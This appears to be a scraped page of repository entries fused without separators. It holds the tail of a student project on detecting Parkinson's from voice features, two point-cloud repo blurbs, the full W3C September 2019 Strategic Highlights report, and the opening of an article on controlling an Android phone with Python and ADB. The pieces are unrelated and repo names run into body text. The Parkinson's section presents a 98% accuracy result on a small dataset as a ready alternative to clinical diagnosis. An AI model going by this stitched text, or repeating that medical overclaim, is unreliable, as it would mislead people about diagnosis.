Parkinson’s, 48 without Parkinson’s) 22 features (elements that are possibly characteristic of Parkinson’s, such as frequency, pitch, amplitude / period of the sound wave) 1 label (1 for Parkinson’s, 0 for no Parkinson’s) Project Pipeline pipeline Summary of Procedure Split the Oxford Parkinson’s Dataset into two parts: one for training, one for validation (evaluate how well the model performs) Train each of the following algorithms with the training set: Logistic Regression, Linear Discriminant Analysis, k Nearest Neighbors, Decision Tree, Neural Network, Naive Bayes, Gradient Boost Evaluate results using the validation set Repeat for the following training set to validation set splits: 80% training / 20% validation, 75% / 25%, and 70% / 30% Repeat for a rescaled version of the dataset (scale all the numbers in the dataset to a range from 0 to 1: this helps to reduce the effect of outliers) Conduct 5 trials and average the results Data a_o a_r m_o m_r Data Analysis In general, the models tended to perform the best (both in terms of accuracy and Matthews Correlation Coefficient) on the rescaled dataset with a 75-25 train-test split. The two highest performing algorithms, k Nearest Neighbors and the Neural Network, both achieved an accuracy of 98%. The NN achieved a MCC of 0.96, while KNN achieved a MCC of 0.94. These figures outperform most existing literature and significantly outperform current methods of diagnosis. Conclusion and Significance These robust results suggest that a machine learning approach can indeed be implemented to significantly improve diagnosis methods of Parkinson’s disease. Given the necessity of early diagnosis for effective treatment, my machine learning models provide a very promising alternative to the current, rather ineffective method of diagnosis. Current methods of early diagnosis are only 53% accurate, while my machine learning model produces 98% accuracy. This 45% increase is critical because an accurate, early diagnosis is needed to effectively treat the disease. Typically, by the time the disease is diagnosed, 60% of nigrostriatal neurons have degenerated, and 80% of striatal dopamine have been depleted. With an earlier diagnosis, much of this degradation could have been slowed or treated. My results are very significant because Parkinson’s affects over 10 million people worldwide who could benefit greatly from an early, accurate diagnosis. Not only is my machine learning approach more accurate in terms of diagnostic accuracy, it is also more scalable, less expensive, and therefore more accessible to people who might not have access to established medical facilities and professionals. The diagnosis is also much simpler, requiring only a 10-15 second voice recording and producing an immediate diagnosis. Future Research Given more time and resources, I would investigate the following: Create a mobile application which would allow the user to record his/her voice, extract the necessary vocal features, and feed it into my machine learning model to diagnose Parkinson’s. Use larger datasets in conjunction with the University of Oxford dataset. Tune and improve my models even further to achieve even better results. Investigate different structures and types of neural networks. Construct a novel algorithm specifically suited for the prediction of Parkinson’s. Generalize my findings and algorithms for all types of dementia disorders, such as Alzheimer’s. References Bind, Shubham. "A Survey of Machine Learning Based Approaches for Parkinson Disease Prediction." International Journal of Computer Science and Information Technologies 6 (2015): n. pag. International Journal of Computer Science and Information Technologies. 2015. Web. 8 Mar. 2017. Brooks, Megan. "Diagnosing Parkinson's Disease Still Challenging." Medscape Medical News. National Institute of Neurological Disorders, 31 July 2014. Web. 20 Mar. 2017. Exploiting Nonlinear Recurrence and Fractal Scaling Properties for Voice Disorder Detection', Little MA, McSharry PE, Roberts SJ, Costello DAE, Moroz IM. BioMedical Engineering OnLine 2007, 6:23 (26 June 2007) Hashmi, Sumaiya F. "A Machine Learning Approach to Diagnosis of Parkinson’s Disease."Claremont Colleges Scholarship. Claremont College, 2013. Web. 10 Mar. 2017. Karplus, Abraham. "Machine Learning Algorithms for Cancer Diagnosis." Machine Learning Algorithms for Cancer Diagnosis (n.d.): n. pag. Mar. 2012. Web. 20 Mar. 2017. Little, Max. "Parkinsons Data Set." UCI Machine Learning Repository. University of Oxford, 26 June 2008. Web. 20 Feb. 2017. Ozcift, Akin, and Arif Gulten. "Classifier Ensemble Construction with Rotation Forest to Improve Medical Diagnosis Performance of Machine Learning Algorithms." Computer Methods and Programs in Biomedicine 104.3 (2011): 443-51. Semantic Scholar. 2011. Web. 15 Mar. 2017. "Parkinson’s Disease Dementia." UCI MIND. N.p., 19 Oct. 2015. Web. 17 Feb. 2017. Salvatore, C., A. Cerasa, I. Castiglioni, F. Gallivanone, A. Augimeri, M. Lopez, G. Arabia, M. Morelli, M.c. Gilardi, and A. Quattrone. "Machine Learning on Brain MRI Data for Differential Diagnosis of Parkinson's Disease and Progressive Supranuclear Palsy."Journal of Neuroscience Methods 222 (2014): 230-37. 2014. Web. 18 Mar. 2017. Shahbakhi, Mohammad, Danial Taheri Far, and Ehsan Tahami. "Speech Analysis for Diagnosis of Parkinson’s Disease Using Genetic Algorithm and Support Vector Machine."Journal of Biomedical Science and Engineering 07.04 (2014): 147-56. Scientific Research. July 2014. Web. 2 Mar. 2017. "Speech and Communication." Speech and Communication. Parkinson's Disease Foundation, n.d. Web. 22 Mar. 2017. Sriram, Tarigoppula V. S., M. Venkateswara Rao, G. V. Satya Narayana, and D. S. V. G. K. Kaladhar. "Diagnosis of Parkinson Disease Using Machine Learning and Data Mining Systems from Voice Dataset." SpringerLink. Springer, Cham, 01 Jan. 1970. Web. 17 Mar. 2017.
eldar / Differentiable Point CloudsThe reference implementation of "Unsupervised Learning of Shape and Pose with Differentiable Point Clouds"
Gregjksmith / Iterative Closest PointImplementation of the iterative closest point algorithm. A point cloud is transformed such that it best matches a reference point cloud.
jettbrains / L W3C Strategic Highlights September 2019 This report was prepared for the September 2019 W3C Advisory Committee Meeting (W3C Member link). See the accompanying W3C Fact Sheet — September 2019. For the previous edition, see the April 2019 W3C Strategic Highlights. For future editions of this report, please consult the latest version. A Chinese translation is available. ☰ Contents Introduction Future Web Standards Meeting Industry Needs Web Payments Digital Publishing Media and Entertainment Web & Telecommunications Real-Time Communications (WebRTC) Web & Networks Automotive Web of Things Strengthening the Core of the Web HTML CSS Fonts SVG Audio Performance Web Performance WebAssembly Testing Browser Testing and Tools WebPlatform Tests Web of Data Web for All Security, Privacy, Identity Internationalization (i18n) Web Accessibility Outreach to the world W3C Developer Relations W3C Training Translations W3C Liaisons Introduction This report highlights recent work of enhancement of the existing landscape of the Web platform and innovation for the growth and strength of the Web. 33 working groups and a dozen interest groups enable W3C to pursue its mission through the creation of Web standards, guidelines, and supporting materials. We track the tremendous work done across the Consortium through homogeneous work-spaces in Github which enables better monitoring and management. We are in the middle of a period where we are chartering numerous working groups which demonstrate the rapid degree of change for the Web platform: After 4 years, we are nearly ready to publish a Payment Request API Proposed Recommendation and we need to soon charter follow-on work. In the last year we chartered the Web Payment Security Interest Group. In the last year we chartered the Web Media Working Group with 7 specifications for next generation Media support on the Web. We have Accessibility Guidelines under W3C Member review which includes Silver, a new approach. We have just launched the Decentralized Identifier Working Group which has tremendous potential because Decentralized Identifier (DID) is an identifier that is globally unique, resolveable with high availability, and cryptographically verifiable. We have Privacy IG (PING) under W3C Member review which strengthens our focus on the tradeoff between privacy and function. We have a new CSS charter under W3C Member review which maps the group's work for the next three years. In this period, W3C and the WHATWG have succesfully completed the negotiation of a Memorandum of Understanding rooted in the mutual belief that that having two distinct specifications claiming to be normative is generally harmful for the Web community. The MOU, signed last May, describes how the two organizations are to collaborate on the development of a single authoritative version of the HTML and DOM specifications. W3C subsequently rechartered the HTML Working Group to assist the W3C community in raising issues and proposing solutions for the HTML and DOM specifications, and for the production of W3C Recommendations from WHATWG Review Drafts. As the Web evolves continuously, some groups are looking for ways for specifications to do so as well. So-called "evergreen recommendations" or "living standards" aim to track continuous development (and maintenance) of features, on a feature-by-feature basis, while getting review and patent commitments. We see the maturation and further development of an incredible number of new technologies coming to the Web. Continued progress in many areas demonstrates the vitality of the W3C and the Web community, as the rest of the report illustrates. Future Web Standards W3C has a variety of mechanisms for listening to what the community thinks could become good future Web standards. These include discussions with the Membership, discussions with other standards bodies, the activities of thousands of participants in over 300 community groups, and W3C Workshops. There are lots of good ideas. The W3C strategy team has been identifying promising topics and invites public participation. Future, recent and under consideration Workshops include: Inclusive XR (5-6 November 2019, Seattle, WA, USA) to explore existing and future approaches on making Virtual and Augmented Reality experiences more inclusive, including to people with disabilities; W3C Workshop on Data Models for Transportation (12-13 September 2019, Palo Alto, CA, USA) W3C Workshop on Web Games (27-28 June 2019, Redmond, WA, USA), view report Second W3C Workshop on the Web of Things (3-5 June 2019, Munich, Germany) W3C Workshop on Web Standardization for Graph Data; Creating Bridges: RDF, Property Graph and SQL (4-6 March 2019, Berlin, Germany), view report Web & Machine Learning. The Strategy Funnel documents the staff's exploration of potential new work at various phases: Exploration and Investigation, Incubation and Evaluation, and eventually to the chartering of a new standards group. The Funnel view is a GitHub Project where new area are issues represented by “cards” which move through the columns, usually from left to right. Most cards start in Exploration and move towards Chartering, or move out of the funnel. Public input is welcome at any stage but particularly once Incubation has begun. This helps W3C identify work that is sufficiently incubated to warrant standardization, to review the ecosystem around the work and indicate interest in participating in its standardization, and then to draft a charter that reflects an appropriate scope. Ongoing feedback can speed up the overall standardization process. Since the previous highlights document, W3C has chartered a number of groups, and started discussion on many more: Newly Chartered or Rechartered Web Application Security WG (03-Apr) Web Payment Security IG (17-Apr) Patent and Standards IG (24-Apr) Web Applications WG (14-May) Web & Networks IG (16-May) Media WG (23-May) Media and Entertainment IG (06-Jun) HTML WG (06-Jun) Decentralized Identifier WG (05-Sep) Extended Privacy IG (PING) (30-Sep) Verifiable Claims WG (30-Sep) Service Workers WG (31-Dec) Dataset Exchange WG (31-Dec) Web of Things Working Group (31-Dec) Web Audio Working Group (31-Dec) Proposed charters / Advance Notice Accessibility Guidelines WG Privacy IG (PING) RDF Literal Direction WG Timed Text WG CSS WG Web Authentication WG Closed Internationalization Tag Set IG Meeting Industry Needs Web Payments All Web Payments specifications W3C's payments standards enable a streamlined checkout experience, enabling a consistent user experience across the Web with lower front end development costs for merchants. Users can store and reuse information and more quickly and accurately complete online transactions. The Web Payments Working Group has republished Payment Request API as a Candidate Recommendation, aiming to publish a Proposed Recommendation in the Fall 2019, and is discussing use cases and features for Payment Request after publication of the 1.0 Recommendation. Browser vendors have been finalizing implementation of features added in the past year (view the implementation report). As work continues on the Payment Handler API and its implementation (currently in Chrome and Edge Canary), one focus in 2019 is to increase adoption in other browsers. Recently, Mastercard demonstrated the use of Payment Request API to carry out EMVCo's Secure Remote Commerce (SRC) protocol whose payment method definition is being developed with active participation by Visa, Mastercard, American Express, and Discover. Payment method availability is a key factor in merchant considerations about adopting Payment Request API. The ability to get uniform adoption of a new payment method such as Secure Remote Commerce (SRC) also depends on the availability of the Payment Handler API in browsers, or of proprietary alternatives. Web Monetization, which the Web Payments Working Group will discuss again at its face-to-face meeting in September, can be used to enable micropayments as an alternative revenue stream to advertising. Since the beginning of 2019, Amazon, Brave Software, JCB, Certus Cybersecurity Solutions and Netflix have joined the Web Payments Working Group. In April, W3C launched the Web Payment Security Group to enable W3C, EMVCo, and the FIDO Alliance to collaborate on a vision for Web payment security and interoperability. Participants will define areas of collaboration and identify gaps between existing technical specifications in order to increase compatibility among different technologies, such as: How do SRC, FIDO, and Payment Request relate? The Payment Services Directive 2 (PSD2) regulations in Europe are scheduled to take effect in September 2019. What is the role of EMVCo, W3C, and FIDO technologies, and what is the current state of readiness for the deadline? How can we improve privacy on the Web at the same time as we meet industry requirements regarding user identity? Digital Publishing All Digital Publishing specifications, Publication milestones The Web is the universal publishing platform. Publishing is increasingly impacted by the Web, and the Web increasingly impacts Publishing. Topic of particular interest to Publishing@W3C include typography and layout, accessibility, usability, portability, distribution, archiving, offline access, print on demand, and reliable cross referencing. And the diverse publishing community represented in the groups consist of the traditional "trade" publishers, ebook reading system manufacturers, but also publishers of audio book, scholarly journals or educational materials, library scientists or browser developers. The Publishing Working Group currently concentrates on Audiobooks which lack a comprehensive standard, thus incurring extra costs and time to publish in this booming market. Active development is ongoing on the future standard: Publication Manifest Audiobook profile for Web Publications Lightweight Packaging Format The BD Comics Manga Community Group, the Synchronized Multimedia for Publications Community Group, the Publishing Community Group and a future group on archival, are companions to the working group where specific work is developed and incubated. The Publishing Community Group is a recently launched incubation channel for Publishing@W3C. The goal of the group is to propose, document, and prototype features broadly related to: publications on the Web reading modes and systems and the user experience of publications The EPUB 3 Community Group has successfully completed the revision of EPUB 3.2. The Publishing Business Group fosters ongoing participation by members of the publishing industry and the overall ecosystem in the development of Web infrastructure to better support the needs of the industry. The Business Group serves as an additional conduit to the Publishing Working Group and several Community Groups for feedback between the publishing ecosystem and W3C. The Publishing BG has played a vital role in fostering and advancing the adoption and continued development of EPUB 3. In particular the BG provided critical support to the update of EPUBCheck to validate EPUB content to the new EPUB 3.2 specification. This resulted in the development, in conjunction with the EPUB3 Community Group, of a new generation of EPUBCheck, i.e., EPUBCheck 4.2 production-ready release. Media and Entertainment All Media specifications The Media and Entertainment vertical tracks media-related topics and features that create immersive experiences for end users. HTML5 brought standard audio and video elements to the Web. Standardization activities since then have aimed at turning the Web into a professional platform fully suitable for the delivery of media content and associated materials, enabling missing features to stream video content on the Web such as adaptive streaming and content protection. Together with Microsoft, Comcast, Netflix and Google, W3C received an Technology & Engineering Emmy Award in April 2019 for standardization of a full TV experience on the Web. Current goals are to: Reinforce core media technologies: Creation of the Media Working Group, to develop media-related specifications incubated in the WICG (e.g. Media Capabilities, Picture-in-picture, Media Session) and maintain maintain/evolve Media Source Extensions (MSE) and Encrypted Media Extensions (EME). Improve support for Media Timed Events: data cues incubation. Enhance color support (HDR, wide gamut), in scope of the CSS WG and in the Color on the Web CG. Reduce fragmentation: Continue annual releases of a common and testable baseline media devices, in scope of the Web Media APIs CG and in collaboration with the CTA WAVE Project. Maintain the Road-map of Media Technologies for the Web which highlights Web technologies that can be used to build media applications and services, as well as known gaps to enable additional use cases. Create the future: Discuss perspectives for Media and Entertainment for the Web. Bring the power of GPUs to the Web (graphics, machine learning, heavy processing), under incubation in the GPU for the Web CG. Transition to a Working Group is under discussion. Determine next steps after the successful W3C Workshop on Web Games of June 2019. View the report. Timed Text The Timed Text Working Group develops and maintains formats used for the representation of text synchronized with other timed media, like audio and video, and notably works on TTML, profiles of TTML, and WebVTT. Recent progress includes: A robust WebVTT implementation report poises the specification for publication as a proposed recommendation. Discussions around re-chartering, notably to add a TTML Profile for Audio Description deliverable to the scope of the group, and clarify that rendering of captions within XR content is also in scope. Immersive Web Hardware that enables Virtual Reality (VR) and Augmented Reality (AR) applications are now broadly available to consumers, offering an immersive computing platform with both new opportunities and challenges. The ability to interact directly with immersive hardware is critical to ensuring that the web is well equipped to operate as a first-class citizen in this environment. The Immersive Web Working Group has been stabilizing the WebXR Device API while the companion Immersive Web Community Group incubates the next series of features identified as key for the future of the Immersive Web. W3C plans a workshop focused on the needs and benefits at the intersection of VR & Accessibility (Inclusive XR), on 5-6 November 2019 in Seattle, WA, USA, to explore existing and future approaches on making Virtual and Augmented Reality experiences more inclusive. Web & Telecommunications The Web is the Open Platform for Mobile. Telecommunication service providers and network equipment providers have long been critical actors in the deployment of Web technologies. As the Web platform matures, it brings richer and richer capabilities to extend existing services to new users and devices, and propose new and innovative services. Real-Time Communications (WebRTC) All Real-Time Communications specifications WebRTC has reshaped the whole communication landscape by making any connected device a potential communication end-point, bringing audio and video communications anywhere, on any network, vastly expanding the ability of operators to reach their customers. WebRTC serves as the corner-stone of many online communication and collaboration services. The WebRTC Working Group aims to bringing WebRTC 1.0 (and companion specification Media Capture and Streams) to Recommendation by the end of 2019. Intense efforts are focused on testing (supported by a dedicated hackathon at IETF 104) and interoperability. The group is considering pushing features that have not gotten enough traction to separate modules or to a later minor revision of the spec. Beyond WebRTC 1.0, the WebRTC Working Group will focus its efforts on WebRTC NV which the group has started documenting by identifying use cases. Web & Networks Recently launched, in the wake of the May 2018 Web5G workshop, the Web & Networks Interest Group is chaired by representatives from AT&T, China Mobile and Intel, with a goal to explore solutions for web applications to achieve better performance and resource allocation, both on the device and network. The group's first efforts are around use cases, privacy & security requirements and liaisons. Automotive All Automotive specifications To create a rich application ecosystem for vehicles and other devices allowed to connect to the vehicle, the W3C Automotive Working Group is delivering a service specification to expose all common vehicle signals (engine temperature, fuel/charge level, range, tire pressure, speed, etc.) The Vehicle Information Service Specification (VISS), which is a Candidate Recommendation, is seeing more implementations across the industry. It provides the access method to a common data model for all the vehicle signals –presently encapsulating a thousand or so different data elements– and will be growing to accommodate the advances in automotive such as autonomous and driver assist technologies and electrification. The group is already working on a successor to VISS, leveraging the underlying data model and the VIWI submission from Volkswagen, for a more robust means of accessing vehicle signals information and the same paradigm for other automotive needs including location-based services, media, notifications and caching content. The Automotive and Web Platform Business Group acts as an incubator for prospective standards work. One of its task forces is using W3C VISS in performing data sampling and off-boarding the information to the cloud. Access to the wealth of information that W3C's auto signals standard exposes is of interest to regulators, urban planners, insurance companies, auto manufacturers, fleet managers and owners, service providers and others. In addition to components needed for data sampling and edge computing, capturing user and owner consent, information collection methods and handling of data are in scope. The upcoming W3C Workshop on Data Models for Transportation (September 2019) is expected to focus on the need of additional ontologies around transportation space. Web of Things All Web of Things specifications W3C's Web of Things work is designed to bridge disparate technology stacks to allow devices to work together and achieve scale, thus enabling the potential of the Internet of Things by eliminating fragmentation and fostering interoperability. Thing descriptions expressed in JSON-LD cover the behavior, interaction affordances, data schema, security configuration, and protocol bindings. The Web of Things complements existing IoT ecosystems to reduce the cost and risk for suppliers and consumers of applications that create value by combining multiple devices and information services. There are many sectors that will benefit, e.g. smart homes, smart cities, smart industry, smart agriculture, smart healthcare and many more. The Web of Things Working Group is finishing the initial Web of Things standards, with support from the Web of Things Interest Group: Web of Things Architecture Thing Descriptions Strengthening the Core of the Web HTML The HTML Working Group was chartered early June to assist the W3C community in raising issues and proposing solutions for the HTML and DOM specifications, and to produce W3C Recommendations from WHATWG Review Drafts. A few days before, W3C and the WHATWG signed a Memorandum of Understanding outlining the agreement to collaborate on the development of a single version of the HTML and DOM specifications. Issues and proposed solutions for HTML and DOM done via the newly rechartered HTML Working Group in the WHATWG repositories The HTML Working Group is targetting November 2019 to bring HTML and DOM to Candidate Recommendations. CSS All CSS specifications CSS is a critical part of the Open Web Platform. The CSS Working Group gathers requirements from two large groups of CSS users: the publishing industry and application developers. Within W3C, those groups are exemplified by the Publishing groups and the Web Platform Working Group. The former requires things like better pagination support and advanced font handling, the latter needs intelligent (and fast!) scrolling and animations. What we know as CSS is actually a collection of almost a hundred specifications, referred to as ‘modules’. The current state of CSS is defined by a snapshot, updated once a year. The group also publishes an index defining every term defined by CSS specifications. Fonts All Fonts specifications The Web Fonts Working Group develops specifications that allow the interoperable deployment of downloadable fonts on the Web, with a focus on Progressive Font Enrichment as well as maintenance of WOFF Recommendations. Recent and ongoing work includes: Early API experiments by Adobe and Monotype have demonstrated the feasibility of a font enrichment API, where a server delivers a font with minimal glyph repertoire and the client can query the full repertoire and request additional subsets on-the-fly. In other experiments, the Brotli compression used in WOFF 2 was extended to support shared dictionaries and patch update. Metrics to quantify improvement are a current hot discussion topic. The group will meet at ATypi 2019 in Japan, to gather requirements from the international typography community. The group will first produce a report summarizing the strengths and weaknesses of each prototype solution by Q2 2020. SVG All SVG specifications SVG is an important and widely-used part of the Open Web Platform. The SVG Working Group focuses on aligning the SVG 2.0 specification with browser implementations, having split the specification into a currently-implemented 2.0 and a forward-looking 2.1. Current activity is on stabilization, increased integration with the Open Web Platform, and test coverage analysis. The Working Group was rechartered in March 2019. A new work item concerns native (non-Web-browser) uses of SVG as a non-interactive, vector graphics format. Audio The Web Audio Working Group was extended to finish its work on the Web Audio API, expecting to publish it as a Recommendation by year end. The specification enables synthesizing audio in the browser. Audio operations are performed with audio nodes, which are linked together to form a modular audio routing graph. Multiple sources — with different types of channel layout — are supported. This modular design provides the flexibility to create complex audio functions with dynamic effects. The first version of Web Audio API is now feature complete and is implemented in all modern browsers. Work has started on the next version, and new features are being incubated in the Audio Community Group. Performance Web Performance All Web Performance specifications There are currently 18 specifications in development in the Web Performance Working Group aiming to provide methods to observe and improve aspects of application performance of user agent features and APIs. The W3C team is looking at related work incubated in the W3C GPU for the Web (WebGPU) Community Group which is poised to transition to a W3C Working Group. A preliminary draft charter is available. WebAssembly All WebAssembly specifications WebAssembly improves Web performance and power by being a virtual machine and execution environment enabling loaded pages to run native (compiled) code. It is deployed in Firefox, Edge, Safari and Chrome. The specification will soon reach Candidate Recommendation. WebAssembly enables near-native performance, optimized load time, and perhaps most importantly, a compilation target for existing code bases. While it has a small number of native types, much of the performance increase relative to Javascript derives from its use of consistent typing. WebAssembly leverages decades of optimization for compiled languages and the byte code is optimized for compactness and streaming (the web page starts executing while the rest of the code downloads). Network and API access all occurs through accompanying Javascript libraries -- the security model is identical to that of Javascript. Requirements gathering and language development occur in the Community Group while the Working Group manages test development, community review and progression of specifications on the Recommendation Track. Testing Browser testing plays a critical role in the growth of the Web by: Improving the reliability of Web technology definitions; Improving the quality of implementations of these technologies by helping vendors to detect bugs in their products; Improving the data available to Web developers on known bugs and deficiencies of Web technologies by publishing results of these tests. Browser Testing and Tools The Browser Testing and Tools Working Group is developing WebDriver version 2, having published last year the W3C Recommendation of WebDriver. WebDriver acts as a remote control interface that enables introspection and control of user agents, provides a platform- and language-neutral wire protocol as a way for out-of-process programs to remotely instruct the behavior of Web, and emulates the actions of a real person using the browser. WebPlatform Tests The WebPlatform Tests project now provides a mechanism which allows to fully automate tests that previously needed to be run manually: TestDriver. TestDriver enables sending trusted key and mouse events, sending complex series of trusted pointer and key interactions for things like in-content drag-and-drop or pinch zoom, and even file upload. Since 2014 W3C began work on this coordinated open-source effort to build a cross-browser test suite for the Web Platform, which WHATWG, and all major browsers adopted. Web of Data All Data specifications There have been several great success stories around the standardization of data on the web over the past year. Verifiable Claims seems to have significant uptake. It is also significant that the Distributed Identifier WG charter has received numerous favorable reviews, and was just recently launched. JSON-LD has been a major success with the large deployment on Web sites via schema.org. JSON-LD 1.1 completed technical work, about to transition to CR More than 25% of websites today include schema.org data in JSON-LD The Web of Things description is in CR since May, making use of JSON-LD Verifiable Credentials data model is in CR since July, also making use of JSON-LD Continued strong interest in decentralized identifiers Engagement from the TAG with reframing core documents, such as Ethical Web Principles, to include data on the web within their scope Data is increasingly important for all organizations, especially with the rise of IoT and Big Data. W3C has a mature and extensive suite of standards relating to data that were developed over two decades of experience, with plans for further work on making it easier for developers to work with graph data and knowledge graphs. Linked Data is about the use of URIs as names for things, the ability to dereference these URIs to get further information and to include links to other data. There are ever-increasing sources of open Linked Data on the Web, as well as data services that are restricted to the suppliers and consumers of those services. The digital transformation of industry is seeking to exploit advanced digital technologies. This will facilitate businesses to integrate horizontally along the supply and value chains, and vertically from the factory floor to the office floor. W3C is seeking to make it easier to support enterprise-wide data management and governance, reflecting the strategic importance of data to modern businesses. Traditional approaches to data have focused on tabular databases (SQL/RDBMS), Comma Separated Value (CSV) files, and data embedded in PDF documents and spreadsheets. We're now in midst of a major shift to graph data with nodes and labeled directed links between them. Graph data is: Faster than using SQL and associated JOIN operations More favorable to integrating data from heterogeneous sources Better suited to situations where the data model is evolving In the wake of the recent W3C Workshop on Graph Data we are in the process of launching a Graph Standardization Business Group to provide a business perspective with use cases and requirements, to coordinate technical standards work and liaisons with external organizations. Web for All Security, Privacy, Identity All Security specifications, all Privacy specifications Authentication on the Web As the WebAuthn Level 1 W3C Recommendation published last March is seeing wide implementation and adoption of strong cryptographic authentication, work is proceeding on Level 2. The open standard Web API gives native authentication technology built into native platforms, browsers, operating systems (including mobile) and hardware, offering protection against hacking, credential theft, phishing attacks, thus aiming to end the era of passwords as a security construct. You may read more in our March press release. Privacy An increasing number of W3C specifications are benefitting from Privacy and Security review; there are security and privacy aspects to every specification. Early review is essential. Working with the TAG, the Privacy Interest Group has updated the Self-Review Questionnaire: Security and Privacy. Other recent work of the group includes public blogging further to the exploration of anti-patterns in standards and permission prompts. Security The Web Application Security Working Group adopted Feature Policy, aiming to allow developers to selectively enable, disable, or modify the behavior of some of these browser features and APIs within their application; and Fetch Metadata, aiming to provide servers with enough information to make a priori decisions about whether or not to service a request based on the way it was made, and the context in which it will be used. The Web Payment Security Interest Group, launched last April, convenes members from W3C, EMVCo, and the FIDO Alliance to discuss cooperative work to enhance the security and interoperability of Web payments (read more about payments). Internationalization (i18n) All Internationalization specifications, educational articles related to Internationalization, spec developers checklist Only a quarter or so current Web users use English online and that proportion will continue to decrease as the Web reaches more and more communities of limited English proficiency. If the Web is to live up to the "World Wide" portion of its name, and for the Web to truly work for stakeholders all around the world engaging with content in various languages, it must support the needs of worldwide users as they engage with content in the various languages. The growth of epublishing also brings requirements for new features and improved typography on the Web. It is important to ensure the needs of local communities are captured. The W3C Internationalization Initiative was set up to increase in-house resources dedicated to accelerating progress in making the World Wide Web "worldwide" by gathering user requirements, supporting developers, and education & outreach. For an overview of current projects see the i18n radar. W3C's Internationalization efforts progressed on a number of fronts recently: Requirements: New African and European language groups will work on the gap analysis, errata and layout requirements. Gap analysis: Japanese, Devanagari, Bengali, Tamil, Lao, Khmer, Javanese, and Ethiopic updated in the gap-analysis documents. Layout requirements document: notable progress tracked in the Southeast Asian Task Force while work continues on Chinese layout requirements. Developer support: Spec reviews: the i18n WG continues active review of specifications of the WHATWG and other W3C Working Groups. Short review checklist: easy way to begin a self-review to help spec developers understand what aspects of their spec are likely to need attention for internationalization, and points them to more detailed checklists for the relevant topics. It also helps those reviewing specs for i18n issues. Strings on the Web: Language and Direction Metadata lays out issues and discusses potential solutions for passing information about language and direction with strings in JSON or other data formats. The document was rewritten for clarity, and expanded. The group is collaborating with the JSON-LD and Web Publishing groups to develop a plan for updating RDF, JSON-LD and related specifications to handle metadata for base direction of text (bidi). User-friendly test format: a new format was developed for Internationalization Test Suite tests, which displays helpful information about how the test works. This particularly useful because those tests are pointed to by educational materials and gap-analysis documents. Web Platform Tests: a large number of tests in the i18n test suite have been ported to the WPT repository, including: css-counter-styles, css-ruby, css-syntax, css-test, css-text-decor, css-writing-modes, and css-pseudo. Education & outreach: (for all educational materials, see the HTML & CSS Authoring Techniques) Web Accessibility All Accessibility specifications, WAI resources The Web Accessibility Initiative supports W3C's Web for All mission. Recent achievements include: Education and training: Inaccessibility of CAPTCHA updated to bring our analysis and recommendations up to date with CAPTCHA practice today, concluding two years of extensive work and invaluable input from the public (read more on the W3C Blog Learn why your web content and applications should be accessible. The Education and Outreach Working Group has completed revision and updating of the Business Case for Digital Accessibility. Accessibility guidelines: The Accessibility Guidelines Working Group has continued to update WCAG Techniques and Understanding WCAG 2.1; and published a Candidate Recommendation of Accessibility Conformance Testing Rules Format 1.0 to improve inter-rater reliability when evaluating conformance of web content to WCAG An updated charter is being developed to host work on "Silver", the next generation accessibility guidelines (WCAG 2.2) There are accessibility aspects to most specifications. Check your work with the FAST checklist. Outreach to the world W3C Developer Relations To foster the excellent feedback loop between Web Standards development and Web developers, and to grow participation from that diverse community, recent W3C Developer Relations activities include: @w3cdevs tracks the enormous amount of work happening across W3C W3C Track during the Web Conference 2019 in San Francisco Tech videos: W3C published the 2019 Web Games Workshop videos The 16 September 2019 Developer Meetup in Fukuoka, Japan, is open to all and will combine a set of technical demos prepared by W3C groups, and a series of talks on a selected set of W3C technologies and projects W3C is involved with Mozilla, Google, Samsung, Microsoft and Bocoup in the organization of ViewSource 2019 in Amsterdam (read more on the W3C Blog) W3C Training In partnership with EdX, W3C's MOOC training program, W3Cx offers a complete "Front-End Web Developer" (FEWD) professional certificate program that consists of a suite of five courses on the foundational languages that power the Web: HTML5, CSS and JavaScript. We count nearly 900K students from all over the world. Translations Many Web users rely on translations of documents developed at W3C whose official language is English. W3C is extremely grateful to the continuous efforts of its community in ensuring our various deliverables in general, and in our specifications in particular, are made available in other languages, for free, ensuring their exposure to a much more diverse set of readers. Last Spring we developed a more robust system, a new listing of translations of W3C specifications and updated the instructions on how to contribute to our translation efforts. W3C Liaisons Liaisons and coordination with numerous organizations and Standards Development Organizations (SDOs) is crucial for W3C to: make sure standards are interoperable coordinate our respective agenda in Internet governance: W3C participates in ICANN, GIPO, IGF, the I* organizations (ICANN, IETF, ISOC, IAB). ensure at the government liaison level that our standards work is officially recognized when important to our membership so that products based on them (often done by our members) are part of procurement orders. W3C has ARO/PAS status with ISO. W3C participates in the EU MSP and Rolling Plan on Standardization ensure the global set of Web and Internet standards form a compatible stack of technologies, at the technical and policy level (patent regime, fragmentation, use in policy making) promote Standards adoption equally by the industry, the public sector, and the public at large Coralie Mercier, Editor, W3C Marketing & Communications $Id: Overview.html,v 1.60 2019/10/15 12:05:52 coralie Exp $ Copyright © 2019 W3C ® (MIT, ERCIM, Keio, Beihang) Usage policies apply.
Masudbro94 / Python Hacked Mobile Phone Open in app Get started ITNEXT Published in ITNEXT You have 2 free member-only stories left this month. Sign up for Medium and get an extra one Kush Kush Follow Apr 15, 2021 · 7 min read · Listen Save How you can Control your Android Device with Python Photo by Caspar Camille Rubin on Unsplash Photo by Caspar Camille Rubin on Unsplash Introduction A while back I was thinking of ways in which I could annoy my friends by spamming them with messages for a few minutes, and while doing some research I came across the Android Debug Bridge. In this quick guide I will show you how you can interface with it using Python and how to create 2 quick scripts. The ADB (Android Debug Bridge) is a command line tool (CLI) which can be used to control and communicate with an Android device. You can do many things such as install apps, debug apps, find hidden features and use a shell to interface with the device directly. To enable the ADB, your device must firstly have Developer Options unlocked and USB debugging enabled. To unlock developer options, you can go to your devices settings and scroll down to the about section and find the build number of the current software which is on the device. Click the build number 7 times and Developer Options will be enabled. Then you can go to the Developer Options panel in the settings and enable USB debugging from there. Now the only other thing you need is a USB cable to connect your device to your computer. Here is what todays journey will look like: Installing the requirements Getting started The basics of writing scripts Creating a selfie timer Creating a definition searcher Installing the requirements The first of the 2 things we need to install, is the ADB tool on our computer. This comes automatically bundled with Android Studio, so if you already have that then do not worry. Otherwise, you can head over to the official docs and at the top of the page there should be instructions on how to install it. Once you have installed the ADB tool, you need to get the python library which we will use to interface with the ADB and our device. You can install the pure-python-adb library using pip install pure-python-adb. Optional: To make things easier for us while developing our scripts, we can install an open-source program called scrcpy which allows us to display and control our android device with our computer using a mouse and keyboard. To install it, you can head over to the Github repo and download the correct version for your operating system (Windows, macOS or Linux). If you are on Windows, then extract the zip file into a directory and add this directory to your path. This is so we can access the program from anywhere on our system just by typing in scrcpy 